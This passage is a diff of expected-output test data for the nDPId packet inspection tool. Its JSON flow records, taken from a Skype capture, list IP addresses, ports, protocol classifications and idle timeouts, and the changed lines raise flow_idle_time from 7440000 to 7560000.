+00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1290,7 +1280,7 @@ 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1311,12 +1301,12 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 